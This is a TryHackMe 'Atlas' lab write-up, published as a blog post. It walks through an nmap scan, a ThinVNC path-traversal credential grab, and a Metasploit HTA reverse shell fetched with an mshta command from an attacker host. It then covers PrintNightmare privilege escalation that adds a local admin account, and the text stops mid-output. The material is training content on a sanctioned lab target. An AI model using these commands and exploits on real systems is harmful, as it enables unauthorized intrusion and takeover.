<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>TryHackMe writeup: Atlas</title><style>
      * {
        font-family: Georgia, Cambria, "Times New Roman", Times, serif;
      }
      html, body {
        margin: 0;
        padding: 0;
      }
      h1 {
        font-size: 50px;
        margin-bottom: 17px;
        color: #333;
      }
      h2 {
        font-size: 24px;
        line-height: 1.6;
        margin: 30px 0 0 0;
        margin-bottom: 18px;
        margin-top: 33px;
        color: #333;
      }
      h3 {
        font-size: 30px;
        margin: 10px 0 20px 0;
        color: #333;
      }
      header {
        width: 640px;
        margin: auto;
      }
      section {
        width: 640px;
        margin: auto;
      }
      section p {
        margin-bottom: 27px;
        font-size: 20px;
        line-height: 1.6;
        color: #333;
      }
      section img {
        max-width: 640px;
      }
      footer {
        padding: 0 20px;
        margin: 50px 0;
        text-align: center;
        font-size: 12px;
      }
      .aspectRatioPlaceholder {
        max-width: auto !important;
        max-height: auto !important;
      }
      .aspectRatioPlaceholder-fill {
        padding-bottom: 0 !important;
      }
      header,
      section[data-field=subtitle],
      section[data-field=description] {
        display: none;
      }
      </style></head><body><article class="h-entry">
<header>
<h1 class="p-name">TryHackMe writeup: Atlas</h1>
</header>
<section data-field="subtitle" class="p-summary">
Join me as I hack into Ayn Rand’s computer (with Yaron Brook’s permission so technically I’m not breaking the NAP ;-)
</section>
<section data-field="body" class="e-content">
<section name="378b" class="section section--body section--first"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="537d" id="537d" class="graf graf--h3 graf--leading graf--title">TryHackMe writeup: Atlas</h3><p name="f2c6" id="f2c6" class="graf graf--p graf--startsWithDoubleQuote graf-after--h3"><a href="https://tryhackme.com/room/atlas" data-href="https://tryhackme.com/room/atlas" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“MurilandOracle” (2021)</a> published a TryHackMe tutorial room discussing a simple ThinVNC vulnerability, a bit of exploit development and testing, and the PrintNightmare vulnerability. In my never-ending quest to “break the rules,” this room took about a week longer for me to complete than MurilandOracle intended. Nonetheless, doing the room was a fun experience. This article will detail how I completed the room.</p><figure name="e74e" id="e74e" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*hvuog2pl0lQzIEk_DnHN9Q.png" data-width="1721" data-height="975" data-is-featured="true" src="https://cdn-images-1.medium.com/max/800/1*hvuog2pl0lQzIEk_DnHN9Q.png"><figcaption class="imageCaption">Base image: <a href="https://www.amazon.com/Age-Selfishness-Morality-Financial-Crisis/dp/1419715984" data-href="https://www.amazon.com/Age-Selfishness-Morality-Financial-Crisis/dp/1419715984" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">Cunningham and Goodwin (2015)</a></figcaption></figure><h3 name="a256" id="a256" class="graf graf--h3 graf-after--figure">Procedure</h3><p name="3300" id="3300" class="graf graf--p graf-after--h3">Before I start, I edited the <code class="markup--code markup--p-code">/etc/hosts</code> file on my AttackBox and added the following line:</p><pre name="3e3d" id="3e3d" class="graf graf--pre graf-after--p">&lt;target ip&gt; atlas.thm</pre><p name="78a4" id="78a4" class="graf graf--p graf-after--pre">I did this because I know that I will not finish the room in one sitting and that the IP address of a TryHackMe boot2root machine will change for each new session. It would be better to record a pseudo-domain name as opposed to a dynamic IP address, so that every time I boot up the target VM, I can just edit the <code class="markup--code markup--p-code">/etc/hosts</code> file with the new target IP address.</p><p name="d181" id="d181" class="graf graf--p graf-after--p">I then clicked on the green-coloured “start machine” button that is on the top-right corner of the first task and proceeded to probe the machine.</p><h4 name="8e18" id="8e18" class="graf graf--h4 graf-after--p">Reconnaissance</h4><p name="abe8" id="abe8" class="graf graf--p graf-after--h4">To “get the ball rolling,” I started with an <a href="https://nmap.org/" data-href="https://nmap.org/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">nmap (n.d.)</a> scan of the target machine:</p><pre name="123e" id="123e" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ sudo nmap -sT -A -v -Pn -p- -O -sC -oX tcp_scan.1.xml atlas.thm </strong>   <br>Host discovery disabled (-Pn). All addresses will be marked &#39;up&#39; and scan times may be slower.<br>Starting Nmap 7.92 (<a href="https://nmap.org" data-href="https://nmap.org" class="markup--anchor markup--pre-anchor" rel="nofollow noopener" target="_blank">https://nmap.org</a>) at [redacted] EDT<br>NSE: Loaded 155 scripts for scanning.<br>NSE: Script Pre-scanning.<br>Initiating NSE at [redacted]</pre><p name="f96e" id="f96e" class="graf graf--p graf-after--pre">The room notes that the target machine is running Windows, so the <code class="markup--code markup--p-code">-Pn</code> flag will need to be used to ignore the fact that Windows does not respond to ICMP requests and proceed to launch a port scan regardless. The <code class="markup--code markup--p-code">-oX tcp_scan.1.xml</code> flag instructs nmap to store its results in a XML format.</p><p name="96b8" id="96b8" class="graf graf--p graf-after--p">I have taken the liberty of converting the raw XML output into a readable HTML format with the <code class="markup--code markup--p-code">xsltproc</code> utility:</p><pre name="bd81" id="bd81" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ xsltproc tcp_scan.1.xml -o tcp_scan.html</strong></pre><p name="5a73" id="5a73" class="graf graf--p graf-after--pre">Fig. 1 shows an excerpt of the <code class="markup--code markup--p-code">xsltproc</code> output — specifically the open ports on the target system:</p><figure name="7aa3" id="7aa3" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*1TOq6CmfAIJQ9X2b6BvKKw.png" data-width="1310" data-height="749" src="https://cdn-images-1.medium.com/max/800/1*1TOq6CmfAIJQ9X2b6BvKKw.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 1</strong></figcaption></figure><p name="bc04" id="bc04" class="graf graf--p graf-after--figure">There are two ports open: one TCP-driven service on 3389 and another TCP-driven service on port 8080. The scan also identified the operating system as “AVtech Room Alert 26W environmental monitor”.</p><p name="4cdd" id="4cdd" class="graf graf--p graf-after--p"><strong class="markup--strong markup--p-strong">Note that</strong> the service on 7680 has been <code class="markup--code markup--p-code">tcpwrappped</code>, which means that whatever is running it is referencing the <code class="markup--code markup--p-code">/etc/hosts.allow</code> and <code class="markup--code markup--p-code">/etc/hosts.deny</code> files and grants (or denies) access based on their configurations (<a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sect-security_guide-tcp_wrappers_and_xinetd-tcp_wrappers_configuration_files" data-href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sect-security_guide-tcp_wrappers_and_xinetd-tcp_wrappers_configuration_files" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Red Hat Customer Portal, n.d</a>). It should also be noted that a <code class="markup--code markup--p-code">tcpwrapped</code> service is different from firewall —something that is discussed in <a href="https://attrition.org/errata/charlatan/carolyn_meinel/www/tech-06.html" data-href="https://attrition.org/errata/charlatan/carolyn_meinel/www/tech-06.html" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Attrition.org (c.a. 1998)</a>.</p><p name="1ddb" id="1ddb" class="graf graf--p graf-after--p">Further inspection of the nmap results shows what the services on port 3389 and 8080 are running respectively. The former is running the remote desktop protocol service (as indicated by the Microsoft Terminal Services banner; also see <a href="https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol" data-href="https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/understanding-remote-desktop-protocol" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Liang et al., 2021</a>), whilst the latter is running the ThinVNC service (<a href="https://sourceforge.net/projects/thinvnc/" data-href="https://sourceforge.net/projects/thinvnc/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Cybele et al., n.d.</a>) — as noted by the following snippet from the nmap results: <code class="markup--code markup--p-code u-paddingRight0 u-marginRight0">[…] ticate: Digest <strong class="markup--strong markup--p-strong">realm=&quot;ThinVNC&quot;</strong>, qop=&quot;aut […]</code>.</p><p name="3532" id="3532" class="graf graf--p graf-after--p">I decided to go with the latter service as a point of entry. I used my AttackBox’s web-browser visit the web service hosted on <code class="markup--code markup--p-code">atlas.thm:8080</code> and was greeted with the following (Fig. 2):</p><figure name="002e" id="002e" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*Lf1yd5aQjhNh-yDD-cJsfQ.png" data-width="517" data-height="327" src="https://cdn-images-1.medium.com/max/800/1*Lf1yd5aQjhNh-yDD-cJsfQ.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 2</strong></figcaption></figure><p name="fa25" id="fa25" class="graf graf--p graf-after--figure">I entered in the username/password combination <code class="markup--code markup--p-code">admin:admin</code>, and it replied with the same login dialog. I then clicked cancel and got a “401 Access Denied” error page.</p><p name="56f1" id="56f1" class="graf graf--p graf-after--p">I then ran <code class="markup--code markup--p-code">searchsploit</code> to get potential candidates for exploiting a vulnerability in the ThinVNC service:</p><pre name="7c46" id="7c46" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ searchsploit thinvnc</strong><br>------------------- -------------------------------------------<br>Exploit Title                         |  Path                                                                        ------------------- -------------------------------------------<br>ThinVNC 1.0b1 - Authentication Bypass | windows/remote/47519.py                                                     <br>---------------------------------------------------------------<br>Shellcodes: No Results</pre><p name="4fb8" id="4fb8" class="graf graf--p graf-after--pre">With a proof of concept at hand, I can now proceed to weaponise it.</p><h4 name="1a7a" id="1a7a" class="graf graf--h4 graf-after--p">Initial access</h4><p name="644c" id="644c" class="graf graf--p graf-after--h4">The proof-of-concept that <code class="markup--code markup--p-code">searchsploit</code> found was devised by <a href="https://www.exploit-db.com/exploits/47519" data-href="https://www.exploit-db.com/exploits/47519" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Tumamlapalli (2019)</a>. I copied said proof-of-concept to my project’s directory and then ran it to get a “feel” of how to use it:</p><pre name="39ed" id="39ed" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ cp /usr/share/exploitdb/exploits/windows/remote/47519.py ./exploit1.py</strong><br>                                                                                                                                    <br><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/Documents/THM/ctf/atlas]<br>└─$ python3 exploit1.py</strong><br>Usage:<br>exploit1.py &lt;host&gt; &lt;port&gt;</pre><pre name="2e05" id="2e05" class="graf graf--pre graf-after--pre">Example:<br>{} 192.168.0.10 5888</pre><p name="5ef8" id="5ef8" class="graf graf--p graf-after--pre">Alright. It looks like the exploit takes in the hostname as the first parameter and the port as the second parameter. I will try to run it with <code class="markup--code markup--p-code">atlas.thm</code> and <code class="markup--code markup--p-code">8080</code>, respectively:</p><pre name="18e1" id="18e1" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ python3 exploit1.py atlas.thm 8080    </strong><br>Traceback (most recent call last):<br>  File &quot;~/atlas/exploit1.py&quot;, line 39, in &lt;module&gt;<br>    main()<br>  File &quot;~/atlas/exploit1.py&quot;, line 36, in main<br>    exploit(host,port)<br>  File &quot;~atlas/exploit1.py&quot;, line 24, in exploit<br>    print(body.splitlines()[2])<br>IndexError: list index out of range</pre><p name="05c1" id="05c1" class="graf graf--p graf-after--pre">Obviously, something is not right 😭. Judging by error messages, the origin of the error is in its <code class="markup--code markup--p-code">exploit()</code> function of the script and it seems to be due to an error parsing some kind of string. The following is a snippet of the exploit that I am trying to debug:</p><figure name="93c8" id="93c8" class="graf graf--figure graf--iframe graf-after--p"><script src="https://gist.github.com/Alekseyyy/a621a72c2cf9b6487cf8313ccc2908eb?file=ctf.2022.thm.atlas.exploit.py.js"></script><figcaption class="imageCaption">The ThinVNC authentication bypass exploit (<a href="https://www.exploit-db.com/exploits/47519" data-href="https://www.exploit-db.com/exploits/47519" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">Tumamlapalli, 2019</a>)</figcaption></figure><p name="e590" id="e590" class="graf graf--p graf-after--figure"><strong class="markup--strong markup--p-strong">Note that</strong> this is just a snippet of the source code, so the line numbers on the error messages outputted by my AttackBox’s terminal may not match the line numbers in the snippet.</p><p name="d7f6" id="d7f6" class="graf graf--p graf-after--p">Looking at the source code of the exploit, it seems that ThinVNC (1.0b1) suffers from a directory traversal vulnerability that enables a malicious hacker to read an <code class="markup--code markup--p-code">.ini</code> file about a directory higher than the web server’s root. I will try to exploit the thing manually:</p><pre name="54f9" id="54f9" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ curl atlas.thm:8080/xyz/../../ThinVnc.ini</strong><br>&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;404 Not Found&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;404 Not Found&lt;/H1&gt;The requested URL ThinVnc.ini was not found on this server.&lt;P&gt;&lt;/BODY&gt;&lt;/HTML&gt;<br>                                                                                                                                    <br><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ curl atlas.thm:8080/xyz/../ThinVnc.ini </strong><br>&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;404 Not Found&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;404 Not Found&lt;/H1&gt;The requested URL ThinVnc.ini was not found on this server.&lt;P&gt;&lt;/BODY&gt;&lt;/HTML&gt;<br>                                                                                                                                    <br><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ curl atlas.thm:8080/xyz/ThinVnc.ini </strong><br>&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;404 Not Found&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;404 Not Found&lt;/H1&gt;The requested URL xyz/ThinVnc.ini was not found on this server.&lt;P&gt;&lt;/BODY&gt;&lt;/HTML&gt;</pre><p name="2d0f" id="2d0f" class="graf graf--p graf-after--pre">After a few minutes of trying similar <code class="markup--code markup--p-code">curl</code> GET requests, I decided to look into the vulnerability further. It appears that the proof-of-concept is broken, and the more reliable proof-of-concept devised by <a href="https://github.com/MuirlandOracle/CVE-2019-17662" data-href="https://github.com/MuirlandOracle/CVE-2019-17662" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“MurilandOracle” (2021b)</a> is to be used to access the system. I proceeded to download AG’s exploit onto my AttackBox and then try it against the system:</p><pre name="b029" id="b029" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ python3 CVE-2019-17662.py atlas.thm 8080</strong></pre><pre name="b1ac" id="b1ac" class="graf graf--pre graf-after--pre">     _____ _     _    __     ___   _  ____                                                                                          <br>    |_   _| |__ (_)_ _\ \   / / \ | |/ ___|                                                                                         <br>      | | | &#39;_ \| | &#39;_ \ \ / /|  \| | |                                                                                             <br>      | | | | | | | | | \ V / | |\  | |___                                                                                          <br>      |_| |_| |_|_|_| |_|\_/  |_| \_|\____|                                                                                         <br>                                                                                                                                    <br>                            @MuirlandOracle<br>[+] Credentials Found!<br>Username:       Atlas<br>Password:       [redacted]</pre><p name="9dd6" id="9dd6" class="graf graf--p graf-after--pre">It worked! For anyone interested in a slightly more thorough assessment of this exploit, and exploiting this vulnerability manually, I will discuss it further in Appendix A.1. But with these credentials at hand, I can now proceed to log in to the system through the ThinVNC service.</p><figure name="dda8" id="dda8" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*mj93YJrz0W4lvrdlaOntFw.png" data-width="697" data-height="441" src="https://cdn-images-1.medium.com/max/800/1*mj93YJrz0W4lvrdlaOntFw.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 3</strong></figcaption></figure><p name="4808" id="4808" class="graf graf--p graf-after--figure">I will use the utility <a href="https://remmina.org/" data-href="https://remmina.org/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Remmina (n.d.)</a> to log in to the target system via ThinVNC protocol. After running the utility, the main user interface shows up (Fig. 3). The thing should be set to “RDP” (Fig. 3b) and I will initiate a temporary connection by clicking on the button with the plus (“+”) icon on the top-left corner (Fig. 3a).</p><figure name="5041" id="5041" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*o4YEgco0T3-YfPa65X3PqA.png" data-width="801" data-height="686" src="https://cdn-images-1.medium.com/max/800/1*o4YEgco0T3-YfPa65X3PqA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 4</strong></figcaption></figure><p name="f79a" id="f79a" class="graf graf--p graf-after--figure">Another window is opened up (Fig. 4) which asks the user to enter in the configuration for the RDP connection. I then inputted the server (Fig. 4a), its username (Fig. 4b) and its password (Fig. 4c). I also configured Remmina to use a custom <code class="markup--code markup--p-code">1380x768</code> resolution (Fig. 4d and 4e) for a larger screen and enabled the “share folder” function which will allow the target system to access files from my AttackBox. Finally, I connected to the target machine’s RDP service by clicking on “connect” button (Fig. 4g). The following window (Fig. 5) shows an RDP-driven interface to the target machine:</p><figure name="81f5" id="81f5" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*83lLFhGbBxbrE402Ht3l_g.png" data-width="1450" data-height="875" src="https://cdn-images-1.medium.com/max/800/1*83lLFhGbBxbrE402Ht3l_g.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 5</strong></figcaption></figure><h4 name="aba5" id="aba5" class="graf graf--h4 graf-after--figure">Post-exploitation</h4><p name="1582" id="1582" class="graf graf--p graf-after--h4">Personally, I feel more comfortable with a Meterpreter shell (<a href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" data-href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Metasploit Unleashed, n.d.</a>). To get it, I initially tried Metasploit’s <code class="markup--code markup--p-code">web_delivery</code> module to deliver it via PowerShell and a <code class="markup--code markup--p-code">base64</code> encoded payload — however the payload failed to execute. So, I searched for an alternative method to deliver and execute the payload via an HTA application (<a href="https://docs.microsoft.com/en-us/previous-versions/ms536496%28v=vs.85%29" data-href="https://docs.microsoft.com/en-us/previous-versions/ms536496(v=vs.85)" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Microsoft Docs, 2013</a>) that was discussed by <a href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" data-href="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Chandel (2019)</a>. On the AttackBox, I fired up Metasploit, and then configured and launched the <code class="markup--code markup--p-code">hta_server</code> module:</p><pre name="b007" id="b007" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ sudo msfconsole  </strong>              <br>[sudo] password for dna: <strong class="markup--strong markup--pre-strong">*inputs password*</strong></pre><pre name="afab" id="afab" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="265f" id="265f" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 &gt; use exploit/windows/misc/hta_server</strong><br>[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt; set SRVHOST 0.0.0.0</strong><br>SRVHOST =&gt; 0.0.0.0<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt; set LHOST &lt;attackbox ip&gt;</strong><br>LHOST =&gt; &lt;attackbox ip&gt;<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt; exploit</strong><br>[*] Exploit running as background job 0.<br>[*] Exploit completed, but no session was created.</pre><pre name="67b4" id="67b4" class="graf graf--pre graf-after--pre">[*] Started reverse TCP handler on &lt;attackbox ip&gt;:4444 <br>[*] Using URL: http://&lt;attackbox ip&gt;:8080/dropper.hta<br>[*] Server started.</pre><p name="6c96" id="6c96" class="graf graf--p graf-after--pre">After running the command <code class="markup--code markup--p-code">mshta.exe http://&lt;attackbox ip&gt;:8080/dropper.hta </code>on the target machine’s command prompt, I got a reverse Meterpreter shell and proceeded to interact with it:</p><pre name="63e0" id="63e0" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt;</strong> [*] Sending stage (175174 bytes) to &lt;target ip&gt;<br>[*] Meterpreter session 1 opened (&lt;attackbox ip&gt;:4444 -&gt; atlas.thm:49859 ) at [redacted] -0400</pre><pre name="6079" id="6079" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/misc/hta_server) &gt; sessions -i 1</strong><br>[*] Starting interaction with 1...</pre><pre name="2fdf" id="2fdf" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="371d" id="371d" class="graf graf--p graf-after--pre">To gain SYSTEM privileges, I will try the traditional <code class="markup--code markup--p-code">getsystem</code> command that comes with Meterpreter’s <code class="markup--code markup--p-code">priv</code> module:</p><pre name="14e2" id="14e2" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; getsystem</strong><br>[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:<br>[-] Named Pipe Impersonation (In Memory/Admin)<br>[-] Named Pipe Impersonation (Dropper/Admin)<br>[-] Token Duplication (In Memory/Admin)<br>[-] Named Pipe Impersonation (RPCSS variant)<br>[-] Named Pipe Impersonation (PrintSpooler variant)<br><strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="5aa4" id="5aa4" class="graf graf--p graf-after--pre">It looks like <code class="markup--code markup--p-code">getsystem</code> is not working. The room recommends privilege escalation via the PrintNightmare vulnerability vector (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" data-href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Microsoft Security Response Center, 2021</a>). In particular, the contender is advised to use the PrintNightmare implementation devised by <a href="https://github.com/calebstewart/CVE-2021-1675" data-href="https://github.com/calebstewart/CVE-2021-1675" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Stewart and Hammond (2021)</a>.</p><p name="cc13" id="cc13" class="graf graf--p graf-after--p">I will start by cloning its repository onto my projects folder on the AttackBox:</p><pre name="621c" id="621c" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$ git clone https://github.com/calebstewart/CVE-2021-1675</strong><br>Cloning into &#39;CVE-2021-1675&#39;...<br>remote: Enumerating objects: 40, done.<br>remote: Counting objects: 100% (40/40), done.<br>remote: Compressing objects: 100% (32/32), done.<br>remote: Total 40 (delta 9), reused 37 (delta 6), pack-reused 0<br>Receiving objects: 100% (40/40), 131.12 KiB | 2.22 MiB/s, done.<br>Resolving deltas: 100% (9/9), done.<br>                                                                                                                                    <br><strong class="markup--strong markup--pre-strong">┌──(dna@deniers)-[~/atlas]<br>└─$</strong></pre><p name="1c97" id="1c97" class="graf graf--p graf-after--pre">Then on the Meterpreter session, I launched a <code class="markup--code markup--p-code">shell</code> interface onto the system, then launched PowerShell and launched the exploit:</p><pre name="6670" id="6670" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; powershell_shell</strong><br><strong class="markup--strong markup--pre-strong">PS &gt; . \\tsclient\atlas\CVE-2021-1675\CVE-2021-1675.ps1<br>PS &gt; Invoke-Nightmare</strong><br>[+] using default new user: adm1n<br>[+] using default new password: P@ssw0rd<br>[+] created payload at C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll</pre><pre name="6a62" id="6a62" class="graf graf--pre graf-after--pre">[*] atlas.thm - Meterpreter session 1 closed.  Reason: Died</pre><pre name="3f7a" id="3f7a" class="graf graf--pre graf-after--pre">Terminate channel 1? [y/N] <strong class="markup--strong markup--pre-strong">*Y*</strong><br>[-] Error running command powershell_shell: Rex::TimeoutError Operation timed out.</pre><p name="6cb6" id="6cb6" class="graf graf--p graf-after--pre">From the output, it looks like a new administrator account was created with the username <code class="markup--code markup--p-code">adm1n</code> and password <code class="markup--code markup--p-code">P@ssw0rd</code>. I will now run the Windows command prompt as this new admin user by right clicking on the command prompt and inputting the newly created credentials (see Fig. 6):</p><figure name="3fe4" id="3fe4" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*B5TmqXbu8a17PF-zjbgOZA.png" data-width="491" data-height="328" src="https://cdn-images-1.medium.com/max/800/1*B5TmqXbu8a17PF-zjbgOZA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 6</strong></figcaption></figure><p name="e038" id="e038" class="graf graf--p graf-after--figure">The username <code class="markup--code markup--p-code">adm1n</code> is supplied to the user field (Fig. 6a) and the password <code class="markup--code markup--p-code">P@ssw0rd</code> is supplied to the password field (Fig. 6b). Then the the “OK” button is clicked to get into the administrator command prompt. Unfortunately, the username and password were not recognised (Fig. 7).</p><figure name="ae57" id="ae57" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*qbyHyIAcA5WLLi9TzuApEg.png" data-width="504" data-height="374" src="https://cdn-images-1.medium.com/max/800/1*qbyHyIAcA5WLLi9TzuApEg.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 7</strong></figcaption></figure><p name="453f" id="453f" class="graf graf--p graf-after--figure graf--trailing">It looks like I will need to find a “work around.”</p></div></div></section><section name="fa24" class="section section--body"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><p name="d8cb" id="d8cb" class="graf graf--p graf--leading">For this lab, I switched on to the remote desktop instance opened up by Remmina and ran the exploit from a PowerShell interface by means of remote desktop:</p><pre name="e483" id="e483" class="graf graf--pre graf-after--p">Windows PowerShell<br>Copyright (C) Microsoft Corporation. All rights reserved.</pre><pre name="ed6e" id="ed6e" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt; Import-Module \\tsclient\atlas\CVE-2021-1675\CVE-2021-1675.ps1</strong></pre><pre name="15ed" id="15ed" class="graf graf--pre graf-after--pre">Security warning<br>Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your<br>computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning<br>message. Do you want to run \\tsclient\atlas\CVE-2021-1675\CVE-2021-1675.ps1?<br>[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is &quot;D&quot;): R</pre><pre name="ed51" id="ed51" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt; Invoke-Nightmare</strong><br>[+] using default new user: adm1n<br>[+] using default new password: P@ssw0rd<br>[+] created payload at C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll<br>[+] using pDriverPath = &quot;C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll&quot;<br>[+] added user  as local administrator<br>[+] deleting payload from C:\Users\Atlas\AppData\Local\Temp\1\nightmare.dll<br><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt; net user</strong></pre><pre name="596a" id="596a" class="graf graf--pre graf-after--pre">User accounts for \\GAIA</pre><pre name="dab8" id="dab8" class="graf graf--pre graf-after--pre">--------------------------------------------------------------------<br>adm1n <strong class="markup--strong markup--pre-strong">[*]</strong>                Administrator            Atlas<br>DefaultAccount           Guest                    WDAGUtilityAccount<br>The command completed successfully.</pre><pre name="1b88" id="1b88" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">PS C:\Users\Atlas&gt;</strong></pre><figure name="1bf9" id="1bf9" class="graf graf--figure graf-after--pre"><img class="graf-image" data-image-id="1*GD1dN_WexxZ8Nfc6pbY4Vg.png" data-width="707" data-height="366" src="https://cdn-images-1.medium.com/max/800/1*GD1dN_WexxZ8Nfc6pbY4Vg.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 8</strong></figcaption></figure><p name="0f6d" id="0f6d" class="graf graf--p graf-after--figure">I then logged in to the new adm1n account via Remmina with the procedure depicted in the exploitation phase (Fig. 4 in particular), opened up the Windows command prompt as an administrator (Fig. 8a), instructed <code class="markup--code markup--p-code">mshta.exe</code> to get the Meterpreter reverse shell via the dropper (Fig. 8b) and…</p><pre name="4adf" id="4adf" class="graf graf--pre graf-after--p">[*] atlas.htm hta_server - Delivering Payload<br>[*] Sending stage (175174 bytes) to atlas.thm<br>[*] Meterpreter session 2 opened (&lt;attackbox ip&gt;:4444 -&gt; atlas.thm:49842 ) at [redacted] -0400</pre><pre name="07e4" id="07e4" class="graf graf--pre graf-after--pre">msf6 exploit(windows/misc/hta_server) &gt; sessions -i 2<br>[*] Starting interaction with 2...</pre><pre name="1cde" id="1cde" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="a9fc" id="a9fc" class="graf graf--p graf-after--pre">I will try the <code class="markup--code markup--p-code">getsystem</code> privilege escalation method again:</p><pre name="5ed6" id="5ed6" class="graf graf--pre graf-after--p">[*] Starting interaction with 2...</pre><pre name="dde8" id="dde8" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt; getsystem</strong><br>...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).<br><strong class="markup--strong markup--pre-strong">meterpreter &gt; getuid</strong><br>Server username: NT 